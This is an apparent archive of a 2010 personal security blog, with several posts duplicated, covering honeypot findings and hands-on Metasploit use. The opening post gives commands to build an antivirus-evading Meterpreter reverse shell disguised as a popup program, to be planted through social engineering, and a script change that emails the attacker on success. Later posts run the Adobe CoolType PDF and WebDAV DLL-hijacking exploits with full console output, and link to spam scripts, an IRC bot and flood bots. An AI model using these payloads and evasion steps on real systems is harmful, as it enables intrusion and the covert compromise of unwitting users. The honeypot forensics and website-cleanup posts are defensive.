Not all hacks happen instantly sometimes you have to wait. The problem is that you might have to wait for days especially when social engineering is taking part in the process.
Even if all things goes well and the attack succeed the payload is a meterpreter connect back shell that will take me to the magic world of new and exciting data. Some problems here, the binary in order to go undetected is encoded using a custom template ( a custom small application that will show a popup ) and this is problem A. This application will just run for some seconds and then it will close, closing meterpreter on the way and my connection. Another problem is that i don't know when the connection is going to take place, it might take place in a few days or even in a couple of weeks that will be problem B.
Problem A is solved easy using a migrate script to migrate into another process and preferably, explorer.exe will be of my taste. So the story on the metasploit console goes like this
./msfpayload windows/meterpreter/reverse_https LHOST=my_dynamic_dns_host LPORT=443 R |./msfencode -k -x ./popup.exe -c 3 -e x86/shikata_ga_nai -t exe -o popup_out.exe
will create a roughly undetected binary with meterpreter inside.
On meterpreter console now running under screen,
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set ExitOnSession false
set LHOST my_dynamic_dns_host
set LPORT 443
set AutoRunScript migrate explorer.exe
exploit -j
This will take care of problem A.
Moving on to problem B now.
By default metasploit doesn't provide us any method to inform the attacker for the process of the attack, if he is not looking at the console screen directly. To overcome this i made a small modification to the migrate.rb script located at scripts/ directory on the metasploit root directory. This small modification does the following, when the attack succeeds and migration is complete a mail will be send to a specific address to inform about the success.
meterpreter > run migrate notepad.exe
[*] Current server process: Explorer.EXE (3156)
[*] Migrating to notepad.exe...
[*] Migrating into process ID 5064
[*] New server process: notepad.exe (5064)
[*] Emailing myself@myhost
The modified migrate.rb can be found here : http://www.deventum.com/research/migrate.rb , if you use it don't forget to change the e-mail address :)
Wednesday, October 6, 2010
Tuesday, September 28, 2010
Intruder alert
It's 4 o clock in the morning and the CISCO intrusion alert system is flash red "Possible security breach" in the big wall screen whilst alerting the sysadmins with voice mails and e-mails ... or maybe I'm still dreaming and this was part of a movie. Still there is an alert on my telephone laying down on the floor next to me with a message, "there must be something here". This is a default message that I've put in a series of bash scripts running under cron every now and then, to alert me for possible filesystem changes and files or directories created where they are not supposed to be.
I've been running some custom honeypots windows and linux for some time now in order to collect malware bots and other goodies, mostly for hobby.
This time the alert came from a linux system, that's running an old phpmyadmin package, it's the second time during a month that the system gets compromised, so there is a lot of activity in phpmyadmin scans both on linux and on windows systems.
Logging in the system immediately i checked the processes running, it's common on these attacks that the attacker will be hiding bot or backdoor with a fake process name. Most of the attackers are masking their backdoors or bots under httpd or apache process making it less obvious for the sysadmin to locate the binary in the first glance.
This time the binary was running under rpc.idmapd name
nobody 15550 0.0 3.1 44368 30928 ? S 04:11 0:06 rpc.idmapd
Easy to spot since the process didn't belong to this specific system configuration. Locating the location of the binary is easy using lsof command. lsof -p 15550 gave the where about of the binary and the open connections. Here most of the times I'm keeping a process dump for further analysis using pcat from tct ( http://www.porcupine.org/forensics/tct.html ) there are many good information that can be found in the active memory dump of the process, like connection strings, username and passwords etc.
This time the binary was, again, a mech bot ( http://www.energymech.net/ ) connecting to quakenet irc network, nothing interesting here :/ hope the attackers will be more creative next time.
Bot packed, http://www.deventum.com/research/15550.tar.gz
I've been running some custom honeypots windows and linux for some time now in order to collect malware bots and other goodies, mostly for hobby.
This time the alert came from a linux system, that's running an old phpmyadmin package, it's the second time during a month that the system gets compromised, so there is a lot of activity in phpmyadmin scans both on linux and on windows systems.
Logging in the system immediately i checked the processes running, it's common on these attacks that the attacker will be hiding bot or backdoor with a fake process name. Most of the attackers are masking their backdoors or bots under httpd or apache process making it less obvious for the sysadmin to locate the binary in the first glance.
This time the binary was running under rpc.idmapd name
nobody 15550 0.0 3.1 44368 30928 ? S 04:11 0:06 rpc.idmapd
Easy to spot since the process didn't belong to this specific system configuration. Locating the location of the binary is easy using lsof command. lsof -p 15550 gave the where about of the binary and the open connections. Here most of the times I'm keeping a process dump for further analysis using pcat from tct ( http://www.porcupine.org/forensics/tct.html ) there are many good information that can be found in the active memory dump of the process, like connection strings, username and passwords etc.
This time the binary was, again, a mech bot ( http://www.energymech.net/ ) connecting to quakenet irc network, nothing interesting here :/ hope the attackers will be more creative next time.
Bot packed, http://www.deventum.com/research/15550.tar.gz
Sunday, September 12, 2010
Phpmyadmin scans
Sunday night and the weather is getting colder, kids asleep, a nice time to check on honeypot logs. Some days ago SANS reported a new at that time binary "dd_ssh" ( http://isc.sans.edu/diary.html?storyid=9370 ) and it related the attack on the phpMyAdmin vulnerability. Honeypot is grabbing some URLs also possibly related on the same attack vector.
GET //phpMyAdmin2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sqlweb/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //webdb/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //php-myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pMA/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //bbs/data/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmy-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysqlmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //webadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.2.6/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-rc1config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6-rc1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-pl1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PHPMYADMIN/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.4/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.2.3/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6-rc2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PMA/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysql-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmyadmin2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //websql/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PMA2005/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sqlmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pma2005/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //roundcube/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysqladminconfig/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sl2/data/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-rc2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //p/m/a/config/config.inc.php?p=phpinfo(); HTTP/1.1
There is one user agent that is appearing in the logs also " User-Agent: Made by ZmEu @ WhiteHat Team - www.whitehat.ro ", the report on whithat.ro ( http://www.mywot.com/en/scorecard/whitehat.ro ) though gives nothing like whitehat...
GET //phpMyAdmin2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmyadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sqlweb/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //webdb/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //php-myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pMA/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //bbs/data/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmy-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysqlmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //webadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pma/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //dbadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.2.6/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-rc1config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6-rc1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-pl1/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PHPMYADMIN/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.4/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.2.3/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.6-rc2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PMA/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //myadmin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysql-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpmyadmin2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //websql/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysql/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //PMA2005/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //php-my-admin/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sqlmanager/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //pma2005/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //roundcube/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //mysqladminconfig/config.inc.php?p=phpinfo(); HTTP/1.1
GET //sl2/data/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //phpMyAdmin-2.5.5-rc2/config/config.inc.php?p=phpinfo(); HTTP/1.1
GET //p/m/a/config/config.inc.php?p=phpinfo(); HTTP/1.1
There is one user agent that is appearing in the logs also " User-Agent: Made by ZmEu @ WhiteHat Team - www.whitehat.ro ", the report on whithat.ro ( http://www.mywot.com/en/scorecard/whitehat.ro ) though gives nothing like whitehat...
Thursday, September 9, 2010
Adobe 0day cooltype and metasploit
Once more metasploit is way ahead of competition, this time with a 0day for adobe pdf reader. Having some time today i thought i give it a try.
In a windows 7 vm, i got the latest pdf reader from adobe ( version 9.3.4 at the moment )
Now on the metasploit console,
root@fr:~/trunk# ./msfconsole
msf > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) >
msf exploit(adobe_cooltype_sing) > info
Name: Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
Version: $Revision$
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Unknown
<@sn0wfl0w>
<@vicheck>
jduck
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.pdf yes The file name.
OUTPUTPATH /home/root/trunk/data/exploits yes The location of the file.
Payload information:
Space: 1000
Avoid: 1 characters
Description:
This module exploits a vulnerability in the Smart INdependent
Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of
Adobe Reader. Prior version are assumed to be vulnerable as well.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2883
http://www.osvdb.org/67849
http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
http://www.adobe.com/support/security/advisories/apsa10-02.html
msf exploit(adobe_cooltype_sing) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > exploit
[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Creating 'msf.pdf' file...
[*] Generated output file /home/root/trunk/data/exploits/msf.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_cooltype_sing) >
Let's get the msf.pdf now and start a generic handler on the msfconsole.
msf exploit(adobe_cooltype_sing) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Starting the payload handler...
On the windows 7 now,
Clicking the msf icon,
No luck at the moment on windows 7, the application crashed with no session. Trying the same on windows XP the screen shows the following:
And on our server we have:
[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to yyy.yyy.yyy.yyy
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:4444 -> yyy.yyy.yyy.yyy:23369) at Thu Sep 09 11:31:38 +0300 2010
meterpreter > sysinfo
Computer: TEST1-150C1E9C9
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language: en_US
meterpreter >
I hope it won't take long for the windows 7 version.
In a windows 7 vm, i got the latest pdf reader from adobe ( version 9.3.4 at the moment )
Now on the metasploit console,
root@fr:~/trunk# ./msfconsole
msf > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) >
msf exploit(adobe_cooltype_sing) > info
Name: Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
Version: $Revision$
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Unknown
<@sn0wfl0w>
<@vicheck>
jduck
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.pdf yes The file name.
OUTPUTPATH /home/root/trunk/data/exploits yes The location of the file.
Payload information:
Space: 1000
Avoid: 1 characters
Description:
This module exploits a vulnerability in the Smart INdependent
Glyplets (SING) table handling within versions 8.2.4 and 9.3.4 of
Adobe Reader. Prior version are assumed to be vulnerable as well.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2883
http://www.osvdb.org/67849
http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html
http://www.adobe.com/support/security/advisories/apsa10-02.html
msf exploit(adobe_cooltype_sing) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > exploit
[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Creating 'msf.pdf' file...
[*] Generated output file /home/root/trunk/data/exploits/msf.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_cooltype_sing) >
Let's get the msf.pdf now and start a generic handler on the msfconsole.
msf exploit(adobe_cooltype_sing) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Starting the payload handler...
On the windows 7 now,
No luck at the moment on windows 7, the application crashed with no session. Trying the same on windows XP the screen shows the following:
And on our server we have:
[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to yyy.yyy.yyy.yyy
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:4444 -> yyy.yyy.yyy.yyy:23369) at Thu Sep 09 11:31:38 +0300 2010
meterpreter > sysinfo
Computer: TEST1-150C1E9C9
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language: en_US
meterpreter >
I hope it won't take long for the windows 7 version.
Infected website cleaning
Having a lot of websites to monitor many times even in the ones most updated you might find backdoors or other goodies. A couple of days ago a client called and said that google was blocking through safe browsing his website, at least one of them, and another one was popping advertisements when visited. It came to my surprise that those sites were infected because i knew that they were updated recently and to my knowledge there was no vulnerability for the latest update.
Poking around a bit it didn't took long to realize that the infection was done through ftp and there was no sql injection or any other vulnerability in the code of the website.
Most of the time, my work finishes there i will tell the client to clean up the code and change the ftp password. In this case the client was also a good friend and i thought to give him a bit of help there.
The infected files where .php and .html files with the following code,
script src="hxxp://youngarea.ru/Vector.js" type="text/javascript"
grep gave the following result,
# grep -R youngarea *| wc
140 420 16869
140 files infected, cleaning them one by one could take some time.
Sed to the rescue !
The following command is looking at the current directory for files ending with php extension and is replacing the lines starting with < , containing youngarea and ending with > with nothing, thus cleaning up the infection.
find . -name "*.php" -type f | xargs sed -i 's/<.*youngarea.*>//g'
The same command was applied also for the files ending with .html
find . -name "*.html" -type f | xargs sed -i 's/<.*youngarea.*>//g'
and the website was clean in a couple of seconds.
Poking around a bit it didn't took long to realize that the infection was done through ftp and there was no sql injection or any other vulnerability in the code of the website.
Most of the time, my work finishes there i will tell the client to clean up the code and change the ftp password. In this case the client was also a good friend and i thought to give him a bit of help there.
The infected files where .php and .html files with the following code,
script src="hxxp://youngarea.ru/Vector.js" type="text/javascript"
grep gave the following result,
# grep -R youngarea *| wc
140 420 16869
140 files infected, cleaning them one by one could take some time.
Sed to the rescue !
The following command is looking at the current directory for files ending with php extension and is replacing the lines starting with < , containing youngarea and ending with > with nothing, thus cleaning up the infection.
find . -name "*.php" -type f | xargs sed -i 's/<.*youngarea.*>//g'
The same command was applied also for the files ending with .html
find . -name "*.html" -type f | xargs sed -i 's/<.*youngarea.*>//g'
and the website was clean in a couple of seconds.
Monday, September 6, 2010
Floodbots and more
Another collection from the honeypot, floodbots and spam scripts. This one personally I have seen it a lot of times in different servers (sender, From: HSBC ) at /tmp directory under the name a/ and ". "
Spam sending scripts at http://www.deventum.com/research/spam.tar.gz , a poor 's man perl bot from TeaMrx team http://www.deventum.com/research/fetch.txt and finally an eggdrop with flood added modules capable for more than 50mbps flood traffic at http://www.deventum.com/research/floodbots2.tar.gz
Spam sending scripts at http://www.deventum.com/research/spam.tar.gz , a poor 's man perl bot from TeaMrx team http://www.deventum.com/research/fetch.txt and finally an eggdrop with flood added modules capable for more than 50mbps flood traffic at http://www.deventum.com/research/floodbots2.tar.gz
Tuesday, August 24, 2010
DLL Hijacking and metasploit part 2
Adding some more common applications that are vulnerable,
( windows live contact ) .contact
( Windows live mail ) .eml
( Opera ) .htm .html .mht .mhtml .xht .xhtm .xhtl
( Windows live mail ) .nws .rss
( Snagit ) .snag
( Snagit accessories ) .results
( Snagit profiles ) .snagprof
( Teamviewer ) .tvc .tvs
( Opera widgets ) .wgt
( windows live contact ) .contact
( Windows live mail ) .eml
( Opera ) .htm .html .mht .mhtml .xht .xhtm .xhtl
( Windows live mail ) .nws .rss
( Snagit ) .snag
( Snagit accessories ) .results
( Snagit profiles ) .snagprof
( Teamviewer ) .tvc .tvs
( Opera widgets ) .wgt
DLL Hijacking and metasploit
Following the excellent post on exploiting DLL hijacking from hdm ( http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html) i made an initial list of file extensions that are exploitable under windows xp sp3 clean install.
Currently the list consist of only four extensions, except .exe files and they are the following:
( group management ) .grp
( Digital ID File ) .p7c
( vCards ) .vcf
( address book files) .wab
Creating an extension list from the above, and using metasploit, we have the following :
./msfconsole
msf > use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) > set EXTENSIONS "grp p7c vcf wab"
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*]
[*] Exploit links are now available at \\xxx.xxx.xxx.xxx\documents\
[*]
[*] Using URL: http://xxx.xxx.xxx.xxx:80/
[*] Server started.
Now at the windows xp system from internet explorer we browse to the site above and after awhile a folder with several documents having the specified extensions will appear. Clicking on any of them will cause the following on the metasploit console:
msf exploit(webdav_dll_hijacker) > [*] yyy.yyy.yyy.yyy:27383 GET => REDIRECT (/)
[*] yyy.yyy.yyy.yyy:27383 GET => DATA (/favicon.ico)
[*] yyy.yyy.yyy.yyy:27482 OPTIONS /
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27482 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27485 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27485 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27485 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/desktop.ini
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 404 (/documents/desktop.ini)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 301 (/documents)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND /documents/
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Directory (/documents/)
[*] yyy.yyy.yyy.yyy:27486 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /documents/policy.p7c
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 File (/documents/policy.p7c)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /documents/wab32res.dll
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 File (/documents/wab32res.dll)
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27650 GET => DLL Payload
[*] yyy.yyy.yyy.yyy:27649 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27649 PROPFIND => 207 Top-Level Directory
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /documents/rundll32.exe
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 404 (/documents/rundll32.exe)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27650 PROPFIND => 207 Top-Level Directory
[*] Sending stage (748544 bytes) to yyy.yyy.yyy.yyy
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /documents/rsaenh.dll
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] yyy.yyy.yyy.yyy:27652 GET => DLL Payload
[*] yyy.yyy.yyy.yyy:27656 PROPFIND /DOCUMENTS
[*] yyy.yyy.yyy.yyy:27656 PROPFIND => 301 (/DOCUMENTS)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND /DOCUMENTS/
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] yyy.yyy.yyy.yyy:27652 PROPFIND => 207 Top-Level Directory
[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:4444 -> yyy.yyy.yyy.yyy:27654) at Tue Aug 24 11:38:57 +0300 2010
And here we have a nice meterpreter session.
Next, installing programs on the target system to identify more products that are vulnerable.
Currently the list consist of only four extensions, except .exe files and they are the following:
( group management ) .grp
( Digital ID File ) .p7c
( vCards ) .vcf
( address book files) .wab
Creating an extension list from the above, and using metasploit, we have the following :
./msfconsole
msf > use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) > set EXTENSIONS "grp p7c vcf wab"
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on xxx.xxx.xxx.xxx:4444
[*]
[*] Exploit links are now available at \\xxx.xxx.xxx.xxx\documents\
[*]
[*] Using URL: http://xxx.xxx.xxx.xxx:80/
[*] Server started.
Now at the windows xp system from internet explorer we browse to the site above and after awhile a folder with several documents having the specified extensions will appear. Clicking on any of them will cause the following on the metasploit console:
msf exploit(webdav_dll_hijacker) > [*] yyy.yyy.yyy.yyy:27383 GET => REDIRECT (/)
[*] yyy.yyy.yyy.yyy:27383 GET => DATA (/favicon.ico)
